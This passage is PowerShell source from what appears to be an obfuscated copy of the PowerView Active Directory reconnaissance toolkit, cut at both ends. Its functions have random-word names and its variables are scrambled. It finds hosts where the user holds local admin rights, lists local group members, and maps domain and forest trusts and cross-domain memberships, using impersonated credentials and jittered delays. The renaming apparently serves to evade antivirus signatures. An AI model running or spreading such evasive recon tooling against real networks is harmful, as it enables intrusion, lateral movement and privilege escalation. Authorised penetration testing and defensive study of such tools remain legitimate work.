if ($PSBoundParameters['Server']) { $uRLeBwzL99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $uRLeBwzL99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $uRLeBwzL99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $uRLeBwzL99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $uRLeBwzL99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $uRLeBwzL99['Credential'] = $KWcDeQDF99 } | |
if ($PSBoundParameters['ComputerName']) { | |
$wzcPABym99 = $MqGzGCsi99 | |
} | |
else { | |
Write-Verbose '[variegated] Querying computers in the domain' | |
$wzcPABym99 = deputes @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname | |
} | |
Write-Verbose "[variegated] TargetComputers length: $($wzcPABym99.Length)" | |
if ($wzcPABym99.Length -eq 0) { | |
throw '[variegated] No hosts found to enumerate' | |
} | |
$OprJRfCy99 = { | |
Param($MqGzGCsi99, $iLRvFQhH99) | |
if ($iLRvFQhH99) { | |
$Null = purveyed -iLRvFQhH99 $iLRvFQhH99 -Quiet | |
} | |
ForEach ($njgHvCfM99 in $MqGzGCsi99) { | |
$Up = Test-Connection -Count 1 -Quiet -MqGzGCsi99 $njgHvCfM99 | |
if ($Up) { | |
$FHnuFQbH99 = curses -MqGzGCsi99 $njgHvCfM99 | |
if ($FHnuFQbH99.IsAdmin) { | |
$njgHvCfM99 | |
} | |
} | |
} | |
if ($iLRvFQhH99) { | |
sepal | |
} | |
} | |
$aiSfwOXj99 = $Null | |
if ($PSBoundParameters['Credential']) { | |
if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { | |
$aiSfwOXj99 = purveyed -KWcDeQDF99 $KWcDeQDF99 | |
} | |
else { | |
$aiSfwOXj99 = purveyed -KWcDeQDF99 $KWcDeQDF99 -Quiet | |
} | |
} | |
} | |
PROCESS { | |
if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { | |
Write-Verbose "[variegated] Total number of hosts: $($wzcPABym99.count)" | |
Write-Verbose "[variegated] Delay: $Delay, Jitter: $UtMZIcCR99" | |
$MJwBTCZE99 = 0 | |
$RDTxeQJK99 = New-Object System.Random | |
ForEach ($njgHvCfM99 in $wzcPABym99) { | |
$MJwBTCZE99 = $MJwBTCZE99 + 1 | |
Start-Sleep -Seconds $RDTxeQJK99.Next((1-$UtMZIcCR99)*$Delay, (1+$UtMZIcCR99)*$Delay) | |
Write-Verbose "[variegated] Enumerating server $njgHvCfM99 ($MJwBTCZE99 of $($wzcPABym99.count))" | |
Invoke-Command -xWxMuRFl99 $OprJRfCy99 -ArgumentList $njgHvCfM99, $aiSfwOXj99 | |
} | |
} | |
else { | |
Write-Verbose "[variegated] Using threading with threads: $TwXZTXel99" | |
$coxNBeiD99 = @{ | |
'TokenHandle' = $aiSfwOXj99 | |
} | |
lowness -MqGzGCsi99 $wzcPABym99 -xWxMuRFl99 $OprJRfCy99 -yvvaxqfq99 $coxNBeiD99 -TwXZTXel99 $TwXZTXel99 | |
} | |
} | |
} | |
function Aron { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.LocalGroupMember.API')] | |
[OutputType('PowerView.LocalGroupMember.WinNT')] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('DNSHostName')] | |
[String[]] | |
$MqGzGCsi99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$LqbSENtU99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$nNRsMphX99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$unLXfRCu99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('OperatingSystem')] | |
[String] | |
$TBhTtASh99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ServicePack')] | |
[String] | |
$INxaoAdc99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('SiteName')] | |
[String] | |
$VYLOaTCe99, | |
[Parameter(ValueFromPipelineByPropertyName = $True)] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ekAEczJN99 = 'Administrators', | |
[ValidateSet('API', 'WinNT')] | |
[Alias('CollectionMethod')] | |
[String] | |
$vjFnrNGz99 = 'API', | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$Delay = 0, | |
[ValidateRange(0.0, 1.0)] | |
[Double] | |
$UtMZIcCR99 = .3, | |
[Int] | |
[ValidateRange(1, 100)] | |
$TwXZTXel99 = 20 | |
) | |
BEGIN { | |
$uRLeBwzL99 = @{ | |
'Properties' = 'dnshostname' | |
} | |
if ($PSBoundParameters['ComputerDomain']) { $uRLeBwzL99['Domain'] = $LqbSENtU99 } | |
if ($PSBoundParameters['ComputerLDAPFilter']) { $uRLeBwzL99['LDAPFilter'] = $nNRsMphX99 } | |
if ($PSBoundParameters['ComputerSearchBase']) { $uRLeBwzL99['SearchBase'] = $unLXfRCu99 } | |
if ($PSBoundParameters['Unconstrained']) { $uRLeBwzL99['Unconstrained'] = $CLwptSbP99 } | |
if ($PSBoundParameters['ComputerOperatingSystem']) { $uRLeBwzL99['OperatingSystem'] = $IRUHhYmI99 } | |
if ($PSBoundParameters['ComputerServicePack']) { $uRLeBwzL99['ServicePack'] = $hKzwkfzE99 } | |
if ($PSBoundParameters['ComputerSiteName']) { $uRLeBwzL99['SiteName'] = $ZbNKanPP99 } | |
if ($PSBoundParameters['Server']) { $uRLeBwzL99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $uRLeBwzL99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $uRLeBwzL99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $uRLeBwzL99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $uRLeBwzL99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $uRLeBwzL99['Credential'] = $KWcDeQDF99 } | |
if ($PSBoundParameters['ComputerName']) { | |
$wzcPABym99 = $MqGzGCsi99 | |
} | |
else { | |
Write-Verbose '[Aron] Querying computers in the domain' | |
$wzcPABym99 = deputes @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname | |
} | |
Write-Verbose "[Aron] TargetComputers length: $($wzcPABym99.Length)" | |
if ($wzcPABym99.Length -eq 0) { | |
throw '[Aron] No hosts found to enumerate' | |
} | |
$OprJRfCy99 = { | |
Param($MqGzGCsi99, $ekAEczJN99, $vjFnrNGz99, $iLRvFQhH99) | |
if ($ekAEczJN99 -eq "Administrators") { | |
$aMtQCwfQ99 = New-Object System.Security.Principal.SecurityIdentifier([System.Security.Principal.WellKnownSidType]::BuiltinAdministratorsSid,$null) | |
$ekAEczJN99 = ($aMtQCwfQ99.Translate([System.Security.Principal.NTAccount]).Value -split "\\")[-1] | |
} | |
if ($iLRvFQhH99) { | |
$Null = purveyed -iLRvFQhH99 $iLRvFQhH99 -Quiet | |
} | |
ForEach ($njgHvCfM99 in $MqGzGCsi99) { | |
$Up = Test-Connection -Count 1 -Quiet -MqGzGCsi99 $njgHvCfM99 | |
if ($Up) { | |
$aAplfuyo99 = @{ | |
'ComputerName' = $njgHvCfM99 | |
'Method' = $vjFnrNGz99 | |
'GroupName' = $ekAEczJN99 | |
} | |
toehold @NetLocalGroupMemberArguments | |
} | |
} | |
if ($iLRvFQhH99) { | |
sepal | |
} | |
} | |
$aiSfwOXj99 = $Null | |
if ($PSBoundParameters['Credential']) { | |
if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { | |
$aiSfwOXj99 = purveyed -KWcDeQDF99 $KWcDeQDF99 | |
} | |
else { | |
$aiSfwOXj99 = purveyed -KWcDeQDF99 $KWcDeQDF99 -Quiet | |
} | |
} | |
} | |
PROCESS { | |
if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { | |
Write-Verbose "[Aron] Total number of hosts: $($wzcPABym99.count)" | |
Write-Verbose "[Aron] Delay: $Delay, Jitter: $UtMZIcCR99" | |
$MJwBTCZE99 = 0 | |
$RDTxeQJK99 = New-Object System.Random | |
ForEach ($njgHvCfM99 in $wzcPABym99) { | |
$MJwBTCZE99 = $MJwBTCZE99 + 1 | |
Start-Sleep -Seconds $RDTxeQJK99.Next((1-$UtMZIcCR99)*$Delay, (1+$UtMZIcCR99)*$Delay) | |
Write-Verbose "[Aron] Enumerating server $njgHvCfM99 ($MJwBTCZE99 of $($wzcPABym99.count))" | |
Invoke-Command -xWxMuRFl99 $OprJRfCy99 -ArgumentList $njgHvCfM99, $ekAEczJN99, $vjFnrNGz99, $aiSfwOXj99 | |
} | |
} | |
else { | |
Write-Verbose "[Aron] Using threading with threads: $TwXZTXel99" | |
$coxNBeiD99 = @{ | |
'GroupName' = $ekAEczJN99 | |
'Method' = $vjFnrNGz99 | |
'TokenHandle' = $aiSfwOXj99 | |
} | |
lowness -MqGzGCsi99 $wzcPABym99 -xWxMuRFl99 $OprJRfCy99 -yvvaxqfq99 $coxNBeiD99 -TwXZTXel99 $TwXZTXel99 | |
} | |
} | |
END { | |
if ($aiSfwOXj99) { | |
sepal -iLRvFQhH99 $aiSfwOXj99 | |
} | |
} | |
} | |
function ordeals { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.DomainTrust.NET')] | |
[OutputType('PowerView.DomainTrust.LDAP')] | |
[OutputType('PowerView.DomainTrust.API')] | |
[CmdletBinding(DefaultParameterSetName = 'LDAP')] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('Name')] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[Parameter(ParameterSetName = 'API')] | |
[Switch] | |
$API, | |
[Parameter(ParameterSetName = 'NET')] | |
[Switch] | |
$NET, | |
[Parameter(ParameterSetName = 'LDAP')] | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$hzaXgjDv99, | |
[Parameter(ParameterSetName = 'LDAP')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$nmZxBYze99, | |
[Parameter(ParameterSetName = 'LDAP')] | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[Parameter(ParameterSetName = 'LDAP')] | |
[Parameter(ParameterSetName = 'API')] | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[Parameter(ParameterSetName = 'LDAP')] | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[Parameter(ParameterSetName = 'LDAP')] | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[Parameter(ParameterSetName = 'LDAP')] | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Parameter(ParameterSetName = 'LDAP')] | |
[Switch] | |
$DPTKXMKA99, | |
[Alias('ReturnOne')] | |
[Switch] | |
$YIVtKGKK99, | |
[Parameter(ParameterSetName = 'LDAP')] | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
$XNfizrna99 = @{ | |
[uint32]'0x00000001' = 'NON_TRANSITIVE' | |
[uint32]'0x00000002' = 'UPLEVEL_ONLY' | |
[uint32]'0x00000004' = 'FILTER_SIDS' | |
[uint32]'0x00000008' = 'FOREST_TRANSITIVE' | |
[uint32]'0x00000010' = 'CROSS_ORGANIZATION' | |
[uint32]'0x00000020' = 'WITHIN_FOREST' | |
[uint32]'0x00000040' = 'TREAT_AS_EXTERNAL' | |
[uint32]'0x00000080' = 'TRUST_USES_RC4_ENCRYPTION' | |
[uint32]'0x00000100' = 'TRUST_USES_AES_KEYS' | |
[uint32]'0x00000200' = 'CROSS_ORGANIZATION_NO_TGT_DELEGATION' | |
[uint32]'0x00000400' = 'PIM_TRUST' | |
} | |
$FVyYRgiq99 = @{} | |
if ($PSBoundParameters['Domain']) { $FVyYRgiq99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['LDAPFilter']) { $FVyYRgiq99['LDAPFilter'] = $hzaXgjDv99 } | |
if ($PSBoundParameters['Properties']) { $FVyYRgiq99['Properties'] = $nmZxBYze99 } | |
if ($PSBoundParameters['SearchBase']) { $FVyYRgiq99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $FVyYRgiq99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $FVyYRgiq99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $FVyYRgiq99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $FVyYRgiq99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $FVyYRgiq99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $FVyYRgiq99['Credential'] = $KWcDeQDF99 } | |
} | |
PROCESS { | |
if ($PsCmdlet.ParameterSetName -ne 'API') { | |
$JbUMmttN99 = @{} | |
if ($ADDDGomQ99 -and $ADDDGomQ99.Trim() -ne '') { | |
$slGpbnVQ99 = $ADDDGomQ99 | |
} | |
else { | |
if ($PSBoundParameters['Credential']) { | |
$slGpbnVQ99 = (aforethought -KWcDeQDF99 $KWcDeQDF99).Name | |
} | |
else { | |
$slGpbnVQ99 = (aforethought).Name | |
} | |
} | |
} | |
elseif ($PsCmdlet.ParameterSetName -ne 'NET') { | |
if ($ADDDGomQ99 -and $ADDDGomQ99.Trim() -ne '') { | |
$slGpbnVQ99 = $ADDDGomQ99 | |
} | |
else { | |
$slGpbnVQ99 = $Env:USERDNSDOMAIN | |
} | |
} | |
if ($PsCmdlet.ParameterSetName -eq 'LDAP') { | |
$ymWdgDDe99 = Richelieu @LdapSearcherArguments | |
$AazsDOBU99 = escarpment @NetSearcherArguments | |
if ($ymWdgDDe99) { | |
$ymWdgDDe99.Filter = '(objectClass=trustedDomain)' | |
if ($PSBoundParameters['FindOne']) { $hCEVDJUr99 = $ymWdgDDe99.FindOne() } | |
else { $hCEVDJUr99 = $ymWdgDDe99.FindAll() } | |
$hCEVDJUr99 | Where-Object {$_} | ForEach-Object { | |
$Props = $_.Properties | |
$iClkUaYg99 = New-Object PSObject | |
$qtKdbbDL99 = @() | |
$qtKdbbDL99 += $XNfizrna99.Keys | Where-Object { $Props.trustattributes[0] -band $_ } | ForEach-Object { $XNfizrna99[$_] } | |
$QYZMOEMS99 = Switch ($Props.trustdirection) { | |
0 { 'Disabled' } | |
1 { 'Inbound' } | |
2 { 'Outbound' } | |
3 { 'Bidirectional' } | |
} | |
$IjVPARSp99 = Switch ($Props.trusttype) { | |
1 { 'WINDOWS_NON_ACTIVE_DIRECTORY' } | |
2 { 'WINDOWS_ACTIVE_DIRECTORY' } | |
3 { 'MIT' } | |
} | |
$mWEoYopz99 = $Props.distinguishedname[0] | |
$QYuVTWiK99 = $mWEoYopz99.IndexOf('DC=') | |
if ($QYuVTWiK99) { | |
$slGpbnVQ99 = $($mWEoYopz99.SubString($QYuVTWiK99)) -replace 'DC=','' -replace ',','.' | |
} | |
else { | |
$slGpbnVQ99 = "" | |
} | |
$aVixIFHj99 = $mWEoYopz99.IndexOf(',CN=System') | |
if ($QYuVTWiK99) { | |
$ShZaeqLs99 = $mWEoYopz99.SubString(3, $aVixIFHj99-3) | |
} | |
else { | |
$ShZaeqLs99 = "" | |
} | |
$NiMYGZmT99 = New-Object Guid @(,$Props.objectguid[0]) | |
$CHKYAbAI99 = (New-Object System.Security.Principal.SecurityIdentifier($Props.securityidentifier[0],0)).Value | |
$iClkUaYg99 | Add-Member Noteproperty 'SourceName' $slGpbnVQ99 | |
$iClkUaYg99 | Add-Member Noteproperty 'TargetName' $Props.name[0] | |
$iClkUaYg99 | Add-Member Noteproperty 'TrustType' $IjVPARSp99 | |
$iClkUaYg99 | Add-Member Noteproperty 'TrustAttributes' $($qtKdbbDL99 -join ',') | |
$iClkUaYg99 | Add-Member Noteproperty 'TrustDirection' "$QYZMOEMS99" | |
$iClkUaYg99 | Add-Member Noteproperty 'WhenCreated' $Props.whencreated[0] | |
$iClkUaYg99 | Add-Member Noteproperty 'WhenChanged' $Props.whenchanged[0] | |
$iClkUaYg99.PSObject.TypeNames.Insert(0, 'PowerView.DomainTrust.LDAP') | |
$iClkUaYg99 | |
} | |
if ($hCEVDJUr99) { | |
try { $hCEVDJUr99.dispose() } | |
catch { | |
Write-Verbose "[ordeals] Error disposing of the Results object: $_" | |
} | |
} | |
$ymWdgDDe99.dispose() | |
} | |
} | |
elseif ($PsCmdlet.ParameterSetName -eq 'API') { | |
if ($PSBoundParameters['Server']) { | |
$rYQenZDK99 = $CbStbNZR99 | |
} | |
elseif ($ADDDGomQ99 -and $ADDDGomQ99.Trim() -ne '') { | |
$rYQenZDK99 = $ADDDGomQ99 | |
} | |
else { | |
$rYQenZDK99 = $Null | |
} | |
$wOXUIqWw99 = [IntPtr]::Zero | |
$Flags = 63 | |
$RqWojtWq99 = 0 | |
$jdzRPRXs99 = $jXhUbjcF99::DsEnumerateDomainTrusts($rYQenZDK99, $Flags, [ref]$wOXUIqWw99, [ref]$RqWojtWq99) | |
$iSpjhTbK99 = $wOXUIqWw99.ToInt64() | |
if (($jdzRPRXs99 -eq 0) -and ($iSpjhTbK99 -gt 0)) { | |
$KDfRICkF99 = $ipMlKQyb99::GetSize() | |
for ($i = 0; ($i -lt $RqWojtWq99); $i++) { | |
$AvQbhhmy99 = New-Object System.Intptr -ArgumentList $iSpjhTbK99 | |
$Info = $AvQbhhmy99 -as $ipMlKQyb99 | |
$iSpjhTbK99 = $AvQbhhmy99.ToInt64() | |
$iSpjhTbK99 += $KDfRICkF99 | |
$QgefhFUQ99 = '' | |
$jdzRPRXs99 = $OTnzYMIG99::ConvertSidToStringSid($Info.DomainSid, [ref]$QgefhFUQ99);$boIzopBu99 = [Runtime.InteropServices.Marshal]::GetLastWin32Error() | |
if ($jdzRPRXs99 -eq 0) { | |
Write-Verbose "[ordeals] Error: $(([ComponentModel.Win32Exception] $boIzopBu99).Message)" | |
} | |
else { | |
$iClkUaYg99 = New-Object PSObject | |
$iClkUaYg99 | Add-Member Noteproperty 'SourceName' $slGpbnVQ99 | |
$iClkUaYg99 | Add-Member Noteproperty 'TargetName' $Info.DnsDomainName | |
$iClkUaYg99 | Add-Member Noteproperty 'TargetNetbiosName' $Info.NetbiosDomainName | |
$iClkUaYg99 | Add-Member Noteproperty 'Flags' $Info.Flags | |
$iClkUaYg99 | Add-Member Noteproperty 'ParentIndex' $Info.ParentIndex | |
$iClkUaYg99 | Add-Member Noteproperty 'TrustType' $Info.TrustType | |
$iClkUaYg99 | Add-Member Noteproperty 'TrustAttributes' $Info.TrustAttributes | |
$iClkUaYg99 | Add-Member Noteproperty 'TargetSid' $QgefhFUQ99 | |
$iClkUaYg99 | Add-Member Noteproperty 'TargetGuid' $Info.DomainGuid | |
$iClkUaYg99.PSObject.TypeNames.Insert(0, 'PowerView.DomainTrust.API') | |
$iClkUaYg99 | |
} | |
} | |
$Null = $jXhUbjcF99::NetApiBufferFree($wOXUIqWw99) | |
} | |
else { | |
Write-Verbose "[ordeals] Error: $(([ComponentModel.Win32Exception] $jdzRPRXs99).Message)" | |
} | |
} | |
else { | |
$eZLXMuUG99 = aforethought @NetSearcherArguments | |
if ($eZLXMuUG99) { | |
$eZLXMuUG99.GetAllTrustRelationships() | ForEach-Object { | |
$_.PSObject.TypeNames.Insert(0, 'PowerView.DomainTrust.NET') | |
$_ | |
} | |
} | |
} | |
} | |
} | |
function Walton { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.ForestTrust.NET')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('Name')] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$hntgZzeP99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
PROCESS { | |
$AYuLePcd99 = @{} | |
if ($PSBoundParameters['Forest']) { $AYuLePcd99['Forest'] = $hntgZzeP99 } | |
if ($PSBoundParameters['Credential']) { $AYuLePcd99['Credential'] = $KWcDeQDF99 } | |
$HegWbuZY99 = truthers @NetForestArguments | |
if ($HegWbuZY99) { | |
$HegWbuZY99.GetAllTrustRelationships() | ForEach-Object { | |
$_.PSObject.TypeNames.Insert(0, 'PowerView.ForestTrust.NET') | |
$_ | |
} | |
} | |
} | |
} | |
function towel { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.ForeignUser')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('Name')] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$hzaXgjDv99, | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$nmZxBYze99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] | |
[String] | |
$FaXdBAYg99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
$ufgcNRNN99 = @{} | |
$ufgcNRNN99['LDAPFilter'] = '(memberof=*)' | |
if ($PSBoundParameters['Domain']) { $ufgcNRNN99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Properties']) { $ufgcNRNN99['Properties'] = $nmZxBYze99 } | |
if ($PSBoundParameters['SearchBase']) { $ufgcNRNN99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $ufgcNRNN99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $ufgcNRNN99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['SecurityMasks']) { $ufgcNRNN99['SecurityMasks'] = $FaXdBAYg99 } | |
if ($PSBoundParameters['Tombstone']) { $ufgcNRNN99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
if ($PSBoundParameters['Raw']) { $ufgcNRNN99['Raw'] = $Raw } | |
} | |
PROCESS { | |
horseshoed @SearcherArguments | ForEach-Object { | |
ForEach ($WpSHaCQh99 in $_.memberof) { | |
$Index = $WpSHaCQh99.IndexOf('DC=') | |
if ($Index) { | |
$XOptDUKd99 = $($WpSHaCQh99.SubString($Index)) -replace 'DC=','' -replace ',','.' | |
$rjCNKeRf99 = $_.distinguishedname | |
$DRBnnDTQ99 = $rjCNKeRf99.IndexOf('DC=') | |
$VeuSFWRJ99 = $($_.distinguishedname.SubString($DRBnnDTQ99)) -replace 'DC=','' -replace ',','.' | |
if ($XOptDUKd99 -ne $VeuSFWRJ99) { | |
$ekAEczJN99 = $WpSHaCQh99.Split(',')[0].split('=')[1] | |
$dvvbkLwm99 = New-Object PSObject | |
$dvvbkLwm99 | Add-Member Noteproperty 'UserDomain' $VeuSFWRJ99 | |
$dvvbkLwm99 | Add-Member Noteproperty 'UserName' $_.samaccountname | |
$dvvbkLwm99 | Add-Member Noteproperty 'UserDistinguishedName' $_.distinguishedname | |
$dvvbkLwm99 | Add-Member Noteproperty 'GroupDomain' $XOptDUKd99 | |
$dvvbkLwm99 | Add-Member Noteproperty 'GroupName' $ekAEczJN99 | |
$dvvbkLwm99 | Add-Member Noteproperty 'GroupDistinguishedName' $WpSHaCQh99 | |
$dvvbkLwm99.PSObject.TypeNames.Insert(0, 'PowerView.ForeignUser') | |
$dvvbkLwm99 | |
} | |
} | |
} | |
} | |
} | |
} | |
function extorts { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.ForeignGroupMember')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('Name')] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$hzaXgjDv99, | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$nmZxBYze99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] | |
[String] | |
$FaXdBAYg99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
$ufgcNRNN99 = @{} | |
$ufgcNRNN99['LDAPFilter'] = '(member=*)' | |
if ($PSBoundParameters['Domain']) { $ufgcNRNN99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Properties']) { $ufgcNRNN99['Properties'] = $nmZxBYze99 } | |
if ($PSBoundParameters['SearchBase']) { $ufgcNRNN99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $ufgcNRNN99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $ufgcNRNN99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['SecurityMasks']) { $ufgcNRNN99['SecurityMasks'] = $FaXdBAYg99 } | |
if ($PSBoundParameters['Tombstone']) { $ufgcNRNN99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
if ($PSBoundParameters['Raw']) { $ufgcNRNN99['Raw'] = $Raw } | |
} | |
PROCESS { | |
$PZUNEAJb99 = @('Users', 'Domain Users', 'Guests') | |
lariat @SearcherArguments | Where-Object { $PZUNEAJb99 -notcontains $_.samaccountname } | ForEach-Object { | |
$ekAEczJN99 = $_.samAccountName | |
$MLxKPdgb99 = $_.distinguishedname | |
$XOptDUKd99 = $MLxKPdgb99.SubString($MLxKPdgb99.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' | |
$_.member | ForEach-Object { | |
$TullGYYM99 = $_.SubString($_.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' | |
if (($_ -match 'CN=S-1-5-21.*-.*') -or ($XOptDUKd99 -ne $TullGYYM99)) { | |
$vSGiHjlO99 = $_ | |
$kgderrSt99 = $_.Split(',')[0].split('=')[1] | |
$ZNRgLBDv99 = New-Object PSObject | |
$ZNRgLBDv99 | Add-Member Noteproperty 'GroupDomain' $XOptDUKd99 | |
$ZNRgLBDv99 | Add-Member Noteproperty 'GroupName' $ekAEczJN99 | |
$ZNRgLBDv99 | Add-Member Noteproperty 'GroupDistinguishedName' $MLxKPdgb99 | |
$ZNRgLBDv99 | Add-Member Noteproperty 'MemberDomain' $TullGYYM99 | |
